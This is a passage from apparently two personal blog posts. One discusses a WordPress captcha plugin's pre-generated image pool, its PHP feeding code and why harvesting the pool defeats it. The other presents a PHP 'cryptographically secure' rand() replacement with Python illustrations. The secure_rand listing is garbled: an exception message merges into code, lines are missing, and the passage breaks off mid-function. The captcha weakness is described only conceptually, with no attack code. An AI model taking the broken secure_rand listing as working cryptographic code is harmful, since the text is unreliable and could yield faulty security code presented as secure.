<p>I soon started to solve the problems in Python and, once the logic was
working there, ported it back to PHP. I did so simply because
debugging the plugin directly involved generating bitmap captchas
on every run, which was a rather tedious process. In short, I underestimated
the complexity completely and failed to set up a productive environment
(I'd better not start elaborating on my attempts to get Xdebug installed
in a XAMPP environment).</p>
<p>While the former issue wasn't the reason I decided to stop the
development, there were other problems with the architecture itself:</p>
<p>My captcha plugin computes randomly placed splines on a
bitmap (these constitute the glyphs) and saves the rather large (no
compression) Netpbm bitmap file on disk, which is then converted to a
PNG with the command line utility pnmtopng.</p>
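<p>The reason the Netpbm detour is attractive is that the format is trivial to write by hand. A minimal Python sketch of a binary PPM (P6) writer might look like this; the function name <code>ppm_bytes</code> is made up for the example and the plugin itself does this in PHP.</p>

```python
def ppm_bytes(pixels):
    """Serialize rows of (r, g, b) tuples (0-255 each) as a binary PPM (P6) image."""
    height = len(pixels)
    width = len(pixels[0])
    # Header: magic number, width and height, maximum colour value.
    header = f"P6\n{width} {height}\n255\n".encode("ascii")
    # Body: three raw bytes per pixel, row by row, without any compression.
    body = bytes(channel for row in pixels for pixel in row for channel in pixel)
    return header + body


if __name__ == "__main__":
    red, green = (255, 0, 0), (0, 255, 0)
    with open("example.ppm", "wb") as handle:
        handle.write(ppm_bytes([[red, green], [green, red]]))
```

<p>The resulting file takes three bytes per pixel plus the header, which explains why the bitmaps are so large before <code>pnmtopng example.ppm &gt; example.png</code> compresses them.</p>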
<p>All this requires a lot of memory and CPU power, since the algorithms to
rasterize lines and Bézier splines are rather expensive. Therefore I
just fire up the captcha factory once every 2 hours (with web
cronjobs or real cronjobs if necessary) in order to feed a finite pool
of captcha images that is slowly but constantly renewing itself.<br>
Every visitor is served a randomly chosen captcha from the pool.
But this approach exhibits a big drawback: The captcha exists to prevent
spammers from posting comments. But due to this captcha-image-pool
design, any malicious user could just request a large number of
captchas until he has obtained the majority of captchas in the pool. Then he
could manually map the obtained pictures to their solutions, teach his
attacking script the answers and BOOM, the captcha is bypassed.<br>
Of course he'd need to update the mappings every two hours, but this
wouldn't stop a motivated attacker from doing so.</p>
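<p>To get a feeling for how cheap this attack is, here is a rough back-of-the-envelope sketch in Python. It assumes that captchas are served uniformly at random from the pool and uses the classic coupon collector argument; the pool size of 100 in the example is a made-up number, not the plugin's actual <code>POOL_SIZE</code>.</p>

```python
def expected_requests(pool_size, distinct_wanted):
    """Expected number of requests until distinct_wanted different captchas were seen.

    With i captchas already known, a request shows a new one with probability
    (pool_size - i) / pool_size, so it takes pool_size / (pool_size - i)
    requests on average to find the next unseen captcha.
    """
    if not 0 <= distinct_wanted <= pool_size:
        raise ValueError("distinct_wanted must be between 0 and pool_size")
    return sum(pool_size / (pool_size - i) for i in range(distinct_wanted))


if __name__ == "__main__":
    pool = 100  # hypothetical pool size
    print("half of the pool:", expected_requests(pool, pool // 2))
    print("the whole pool:  ", expected_requests(pool, pool))
```

<p>Collecting half of the pool costs fewer requests than the pool has images, so an attacker who only needs to pass the captcha every now and then is done very quickly.</p>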
<p>In short: Because plotting bitmaps and computing splines is a very
expensive task, I simply can't manufacture fresh captchas for every
user. I need to have a collection of pre-built captcha pictures that are
randomly chosen to be presented to visitors. But this is a weak design
from a security point of view.<br>
Although there are countermeasures, they cannot neutralize the root
problem and keep evil minds from finding a circumvention.</p>
<p>Here is an example of how I implemented that "pool feeding":</p>
<div class="highlight"><pre><span></span><code><span class="x">/*</span>
<span class="x"> * Only the cronjob calls this file directly. The cronjob must have the same</span>
<span class="x"> * IP address as the webserver, otherwise it won't be executed. This prevents</span>
<span class="x"> * users from calling this file directly and DDOSing the server</span>
<span class="x"> */</span>
<span class="x">if (basename(__FILE__) == basename($_SERVER["SCRIPT_FILENAME"])) {</span>
<span class="x"> if (in_array($_SERVER['REMOTE_ADDR'], array('127.0.0.1', '::1'))) {</span>
<span class="x"> require_once('cunning_captcha_lib.php');</span>
<span class="x"> /* Bring the wordpress API into play */</span>
<span class="x"> define('WP_USE_THEMES', false);</span>
<span class="x"> require('../../../wp-blog-header.php'); /* Assuming we're in plugin directory */</span>
<span class="x"> ccaptcha_feed_pool(); /* Feed the little monster */</span>
<span class="x"> } else {</span>
<span class="x"> wp_die(__('Error: Dont call CunningCaptcha directly. It does not like it :(.', 'CunningCaptcha'));</span>
<span class="x"> }</span>
<span class="x">}</span>
<span class="x">// ...</span>
<span class="x">/*</span>
<span class="x"> * Adds new captcha images to the pool.</span>
<span class="x"> */</span>
<span class="x">function ccaptcha_feed_pool() {</span>
<span class="x"> /* First of all check if pnmtopng is available on the system */</span>
<span class="x"> $handle = popen('/usr/bin/which pnmtopng 2>&1', 'r');</span>
<span class="x"> $read = fread($handle, 2096);</span>
<span class="x"> pclose($handle);</span>
<span class="x"> if (!file_exists(trim($read))) {</span>
<span class="x"> print("pnmtopng is not installed on the system.");</span>
<span class="x"> return false;</span>
<span class="x"> }</span>
<span class="x"> /* Check if target dir exists, if not, create it */</span>
<span class="x"> if (!file_exists(trailingslashit(TARGET_DIR)) && !is_dir(trailingslashit(TARGET_DIR))) {</span>
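<span class="x"> if (!mkdir(trailingslashit(TARGET_DIR), 0755)) {</span>
<span class="x"> /* Only bail out if the directory really could not be created */</span>
<span class="x"> print("Couldn't create image directory");</span>
<span class="x"> return false;</span>
<span class="x"> }</span>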
<span class="x"> }</span>
<span class="x"> /* If there are no png files in the target directory, unset the option */</span>
<span class="x"> if (false === strpos(implode('', array_values(scandir(trailingslashit(TARGET_DIR)))), 'png')) {</span>
<span class="x"> echo "deleted options";</span>
<span class="x"> delete_option('ccaptcha_path_captcha_a');</span>
<span class="x"> }</span>
<span class="x"> $captchas = cclib_generateCaptchas($path = trailingslashit(TARGET_DIR), $number = 10, $captchalength = 5);</span>
<span class="x"> /* Convert them to png using pnmtopng */</span>
<span class="x"> foreach (array_keys($captchas) as $path) {</span>
<span class="x"> $path = escapeshellarg($path);</span>
<span class="x"> system(sprintf("pnmtopng %s > %s && rm %s;", $path . '.ppm', $path . '.png', $path . '.ppm'));</span>
<span class="x"> }</span>
<span class="x"> /*</span>
<span class="x"> * If the pool size is now too large, delete the superfluous (redundant) files from the directory</span>
<span class="x"> * and the options database.</span>
<span class="x"> */</span>
<span class="x"> $cnt = 0;</span>
<span class="x"> foreach (glob(trailingslashit(TARGET_DIR) . "*.png") as $filename) {</span>
<span class="x"> $filetimes[$filename] = filectime($filename);</span>
<span class="x"> $cnt++;</span>
<span class="x"> }</span>
<span class="x"> if ($cnt > POOL_SIZE) {</span>
<span class="x"> $num_to_delete = $cnt - POOL_SIZE;</span>
<span class="x"> /* Sort the array by value (unix timestamp) */</span>
<span class="x"> if (!asort($filetimes, SORT_NUMERIC)) {</span>
<span class="x"> print("couldn't sort images by modification time.");</span>
<span class="x"> return false;</span>
<span class="x"> }</span>
<span class="x"> $keys = array_keys($filetimes);</span>
<span class="x"> $savedcaptchas = get_option('ccaptcha_path_captcha_a'); /* This array cannot (shouldn't) be empty */</span>
<span class="x"> foreach (range(0, $num_to_delete - 1) as $i) {</span>
<span class="x"> unlink($keys[$i]);</span>
<span class="x"> /* Cut off the ".png" suffix; rtrim() would treat '.png' as a set of characters */</span>
<span class="x"> unset($savedcaptchas[substr($keys[$i], 0, -4)]);</span>
<span class="x"> }</span>
<span class="x"> /* Synchronize the deletions with the options database */</span>
<span class="x"> if (false === update_option('ccaptcha_path_captcha_a', $savedcaptchas)) {</span>
<span class="x"> /* update failed or the option didn't change */</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> $savedcaptchas = get_option('ccaptcha_path_captcha_a');</span>
<span class="x"> if (!$savedcaptchas) // Create</span>
<span class="x"> update_option('ccaptcha_path_captcha_a', $captchas);</span>
<span class="x"> else { // Add</span>
<span class="x"> update_option('ccaptcha_path_captcha_a', array_merge($savedcaptchas, $captchas));</span>
<span class="x"> }</span>
<span class="x"> /* Check if the directory and the options database are synchronized */</span>
<span class="x"> $a = get_option('ccaptcha_path_captcha_a');</span>
<span class="x"> foreach (array_keys($a) as $key)</span>
<span class="x"> if (!file_exists($key . '.png'))</span>
<span class="x"> wp_die("Options database doesn't match with FS");</span>
<span class="x"> D($a);</span>
<span class="x"> return true;</span>
<span class="x">}</span>
</code></pre></div>
<h3>What now?</h3>
<p>It's not all bad. The plugin that I see as a failure actually works.
The estimated 3000 lines of code (including Python sources)
weren't for nothing. You can dig into it on <a href="https://github.com/NikolaiT/CunningCaptcha">my GitHub
account</a> if you like. I
learned a lot and I have come up with another idea that is better (I
need to watch out that I don't repeat the mistakes I pointed out
above). But before I begin with the new idea, I will think it through
thoroughly! You can be damn sure of that!</p>
<h3>Epilogue</h3>
<p>To conclude this post about my failed attempt, let's actually show how
the plugin works in its current unfinished form. Let me repeat: It
works. It's a rather bad captcha (it would be easy to crack with OCR), but
one could use it in WordPress.</p>
<p>Here are some captchas generated in distinct forms:</p>
<p><img alt="The captcha in the comment form. Note: The error message reveals that I was
pretty frustrated while coding
:D" src="https://incolumitas.com/uploads/2013/11/captcha_in_action2.png"></p>
<p><img alt="The captcha embedded in the comment
form..." src="https://incolumitas.com/uploads/2013/11/captcha_in_action1-300x300.png"></p>
<p>Let me know what you think...</p>
<p>Cheers</p>Cryptographically secure rand() replacement2013-11-14T22:55:00+01:002013-11-14T22:55:00+01:00Nikolai Tschachertag:incolumitas.com,2013-11-14:/2013/11/14/cryptographically-secure-rand-replacement/<p>If you are a programmer, you sometimes find yourself in the need for
random numbers. There are many possible use cases:</p>
<ul>
<li>Generate data for unit-tests.</li>
<li>Build secure passwords or keys as input for ciphers like AES,
Twofish and its colleagues.</li>
<li>Simulating the real world for modelling applications.</li>
<li>A prominent use case: Lots of gambling sites depend on good random
number generators.</li>
</ul>
<p>Now if you code in PHP, there are quite a few different ways to obtain
random numbers. There is the <a href="http://www.php.net/manual/en/function.rand.php" title="rand"><code>rand ( int $min , int $max
)</code></a> function, for
instance: It yields a random number within the range specified by the
<code>$min</code> and <code>$max</code> parameters.</p>
<p>The documentation states that this approach isn't particularly secure
and shouldn't be used for applications that need to feed algorithms with
cryptographically secure random data. Then there's <a href="http://www.php.net/manual/en/function.mt-rand.php"><code>mt_rand ( int
$min , int $max )</code></a>,
which apparently creates <em>better</em> random values, but is certainly not suitable
for crypto purposes either.<br>
Quite a few applications have suffered from security bugs
because they used <code>rand()</code> or <code>mt_rand()</code> for passwords, encryption keys,
session cookies, CSRF tokens and the like. See also this
related discussion on
<a href="http://security.stackexchange.com/questions/18033/how-insecure-are-phps-rand-functions">security.stackexchange.com</a>.</p>
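<p>Why is a generator like this a problem for tokens? The following Python sketch illustrates the core issue. Python's <code>random</code> module uses the Mersenne Twister, the same family of generator that <code>mt_rand()</code> is based on, so anyone who learns or guesses the seed can reproduce every "random" token. The function names are made up for this example.</p>

```python
import random
import secrets

HEX_DIGITS = "0123456789abcdef"


def weak_token(seed, length=8):
    """Token from a seeded Mersenne Twister: fully determined by the seed."""
    rng = random.Random(seed)
    return "".join(rng.choice(HEX_DIGITS) for _ in range(length))


def strong_token(length=8):
    """Token from the operating system's CSPRNG via the secrets module."""
    return secrets.token_hex(length // 2)  # two hex digits per random byte


if __name__ == "__main__":
    # An attacker who knows the seed gets exactly the same token as the server.
    print(weak_token(1234) == weak_token(1234))
    print(strong_token())
```

<p>The weak variant is perfectly fine for unit tests or simulations, where reproducibility is even desirable. It just must not protect anything.</p>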
<p>But because of the convenience of the <code>$min</code>, <code>$max</code> interface of <code>rand()</code> and
<code>mt_rand()</code> and its intuitive handling, I implemented the same interface
on top of a cryptographically secure pseudo random number generator:
<a href="http://www.php.net/manual/en/function.openssl-random-pseudo-bytes.php"><code>openssl_random_pseudo_bytes ( int $length [, bool
&amp;$crypto_strong ] )</code></a>.</p>
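<p>The general idea of turning raw random bytes into a number within a range can be sketched in a few lines of Python. Note that this is not a port of my PHP function: it uses plain rejection sampling on <code>os.urandom()</code> and does not cache bytes in a lookup table. The name <code>secure_randint</code> is made up for this sketch.</p>

```python
import os


def secure_randint(start, stop):
    """Return a uniformly distributed integer in [start, stop] from OS randomness."""
    if start > stop:
        raise ValueError("start must not be greater than stop")
    span = stop - start + 1
    nbytes = (span.bit_length() + 7) // 8
    # Largest multiple of span that fits into nbytes; values at or above it
    # would make some results more likely than others (modulo bias).
    limit = (256 ** nbytes // span) * span
    while True:
        value = int.from_bytes(os.urandom(nbytes), "big")
        if value < limit:  # otherwise throw the value away and draw again
            return start + value % span


if __name__ == "__main__":
    print([secure_randint(0, 200) for _ in range(10)])
```

<p>Simply taking the random value modulo the range size would be shorter, but it slightly favours small results whenever the range size does not divide the number of possible byte values.</p>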
<p>Here is the function that does the job:</p>
<div class="highlight"><pre><span></span><code><span class="w"> </span><span class="p">:::</span><span class="n">PHP</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Generates</span><span class="w"> </span><span class="n">cryptographically</span><span class="w"> </span><span class="n">secure</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">numbers</span><span class="w"> </span><span class="n">including</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nb">range</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="n">with</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">good</span><span class="w"> </span><span class="n">performance</span><span class="w"> </span><span class="p">(</span><span class="n">especially</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">ranges</span><span class="w"> </span><span class="n">from</span><span class="w"> </span><span class="mi">0</span><span class="o">-</span><span class="mi">255</span><span class="p">)</span><span class="o">!</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Calls</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="p">()</span><span class="w"> </span><span class="n">are</span><span class="w"> </span><span class="n">cached</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="n">array</span><span class="w"> </span><span class="o">$</span><span class="n">LUT</span><span class="o">.</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">For</span><span class="w"> </span><span class="n">instance</span><span class="p">,</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">need</span><span class="w"> </span><span class="n">only</span><span class="w"> </span><span class="n">around</span><span class="w"> </span><span class="mi">2</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="n">order</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">obtain</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="mi">1000</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">values</span><span class="w"> </span><span class="n">between</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="mf">200.</span><span class="w"> </span><span class="n">This</span><span class="w"> </span><span class="n">ensures</span><span class="w"> </span><span class="n">good</span><span class="w"> </span><span class="n">performance</span><span class="o">!</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Both</span><span class="w"> </span><span class="n">parameters</span><span class="w"> </span><span class="n">need</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="n">positive</span><span class="o">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">need</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">negative</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">value</span><span class="p">,</span><span class="w"> </span><span class="n">just</span><span class="w"> </span><span class="k">pass</span><span class="w"> </span><span class="n">positive</span><span class="w"> </span><span class="n">values</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">function</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="n">then</span><span class="w"> </span><span class="n">make</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">value</span><span class="w"> </span><span class="n">negative</span><span class="w"> </span><span class="n">on</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">own</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">function</span><span class="w"> </span><span class="n">returns</span><span class="w"> </span><span class="n">False</span><span class="p">,</span><span class="w"> </span><span class="n">something</span><span class="w"> </span><span class="n">went</span><span class="w"> </span><span class="n">wrong</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">Always</span><span class="w"> </span><span class="n">check</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="bp">false</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="s2">"==="</span><span class="w"> </span><span class="n">operator</span><span class="p">,</span><span class="w"> </span><span class="n">otherwise</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">fail</span><span class="w"> </span><span class="n">might</span><span class="w"> </span><span class="n">shadow</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">valid</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">value</span><span class="p">:</span><span class="w"> </span><span class="n">zero</span><span class="o">.</span><span class="w"> </span><span class="n">You</span><span class="w"> </span><span class="n">can</span><span class="w"> </span><span class="k">pass</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">boolean</span><span class="w"> </span><span class="n">parameter</span><span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="o">.</span><span class="w"> </span><span class="n">If</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="bp">true</span><span class="p">,</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">value</span><span class="w"> </span><span class="k">is</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="n">cryptographically</span><span class="w"> </span><span class="n">secure</span><span class="p">,</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="n">it</span><span class="w"> </span><span class="n">was</span><span class="w"> </span><span class="n">generated</span><span class="w"> </span><span class="n">with</span><span class="w"> </span><span class="n">rand</span><span class="p">()</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">staticvar</span><span class="w"> </span><span class="n">array</span><span class="w"> </span><span class="o">$</span><span class="n">LUT</span><span class="w"> </span><span class="n">A</span><span class="w"> </span><span class="n">lookup</span><span class="w"> </span><span class="n">table</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">store</span><span class="w"> </span><span class="n">bytes</span><span class="w"> </span><span class="n">from</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">secure_random_number</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">param</span><span class="w"> </span><span class="nb nb-Type">int</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="n">bottom</span><span class="w"> </span><span class="n">border</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nb">range</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">param</span><span class="w"> </span><span class="nb nb-Type">int</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="n">top</span><span class="w"> </span><span class="n">border</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nb">range</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">param</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="nb nb-Type">bool</span><span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="n">Whether</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">call</span><span class="w"> </span><span class="n">to</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="w"> </span><span class="n">was</span><span class="w"> </span><span class="n">made</span><span class="w"> </span><span class="n">securely</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">param</span><span class="w"> </span><span class="nb nb-Type">int</span><span class="w"> </span><span class="o">$</span><span class="n">calls</span><span class="w"> </span><span class="n">The</span><span class="w"> </span><span class="n">number</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">calls</span><span class="w"> </span><span class="n">already</span><span class="w"> </span><span class="n">made</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="k">return</span><span class="w"> </span><span class="nb nb-Type">int</span><span class="w"> </span><span class="n">A</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">integer</span><span class="w"> </span><span class="n">within</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nb">range</span><span class="w"> </span><span class="p">(</span><span class="n">including</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">edges</span><span class="p">)</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">throws</span><span class="w"> </span><span class="n">InvalidArgumentException</span><span class="w"> </span><span class="n">Thrown</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">input</span><span class="w"> </span><span class="nb">range</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">invalid</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">throws</span><span class="w"> </span><span class="n">UnexpectedValueException</span><span class="w"> </span><span class="n">Thrown</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="w"> </span><span class="n">was</span><span class="w"> </span><span class="n">called</span><span class="w"> </span><span class="n">unsecurely</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="err">@</span><span class="n">throws</span><span class="w"> </span><span class="n">ErrorException</span><span class="w"> </span><span class="n">Thrown</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">unpack</span><span class="w"> </span><span class="n">fails</span><span class="o">.</span><span class="w"></span>
<span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="n">function</span><span class="w"> </span><span class="n">secure_rand</span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">,</span><span class="w"> </span><span class="o">&$</span><span class="n">secure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">"True"</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">calls</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">||</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">throw</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">InvalidArgumentException</span><span class="p">(</span><span class="s2">"Either stop= 65536 && $range < 4294967296) {</span>
<span class="w"> </span><span class="o">$</span><span class="n">format</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">'L'</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">num_bytes</span><span class="w"> </span><span class="o"><<=</span><span class="w"> </span><span class="mi">3</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="n">Before</span><span class="w"> </span><span class="n">we</span><span class="w"> </span><span class="n">do</span><span class="w"> </span><span class="n">anything</span><span class="p">,</span><span class="w"> </span><span class="n">lets</span><span class="w"> </span><span class="n">see</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="n">we</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">value</span><span class="w"> </span><span class="ow">in</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">LUT</span><span class="w"> </span><span class="n">within</span><span class="w"> </span><span class="n">our</span><span class="w"> </span><span class="nb">range</span><span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">is_array</span><span class="p">(</span><span class="o">$</span><span class="n">LUT</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="o">!</span><span class="n">empty</span><span class="p">(</span><span class="o">$</span><span class="n">LUT</span><span class="p">)</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="o">$</span><span class="n">last_lu</span><span class="w"> </span><span class="o">===</span><span class="w"> </span><span class="o">$</span><span class="n">format</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">foreach</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">LUT</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="o">$</span><span class="n">key</span><span class="w"> </span><span class="o">=></span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">value</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="o">$</span><span class="n">start</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="w"> </span><span class="o"><=</span><span class="w"> </span><span class="o">$</span><span class="n">stop</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">secure</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">True</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">unset</span><span class="p">(</span><span class="o">$</span><span class="n">LUT</span><span class="p">[</span><span class="o">$</span><span class="n">key</span><span class="p">]);</span><span class="w"> </span><span class="o">//</span><span class="w"> </span><span class="n">Next</span><span class="w"> </span><span class="n">run</span><span class="p">,</span><span class="w"> </span><span class="n">next</span><span class="w"> </span><span class="n">value</span><span class="p">,</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="n">my</span><span class="w"> </span><span class="n">dad</span><span class="w"> </span><span class="n">always</span><span class="w"> </span><span class="n">said</span><span class="o">!</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="o">$</span><span class="n">value</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="o">/*</span><span class="w"> </span><span class="n">Get</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">blob</span><span class="w"> </span><span class="n">of</span><span class="w"> </span><span class="n">cryptographically</span><span class="w"> </span><span class="n">secure</span><span class="w"> </span><span class="n">random</span><span class="w"> </span><span class="n">bytes</span><span class="w"> </span><span class="o">*/</span><span class="w"></span>
<span class="w"> </span><span class="o">$</span><span class="n">binary</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">openssl_random_pseudo_bytes</span><span class="p">(</span><span class="o">$</span><span class="n">num_bytes</span><span class="p">,</span><span class="w"> </span><span class="o">$</span><span class="n">crypto_strong</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">$</span><span class="n">crypto_strong</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">False</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">throw</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">UnexpectedValueException</span><span class="p">(</span><span class="s2">"openssl_random_bytes cannot access secure PRNG"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
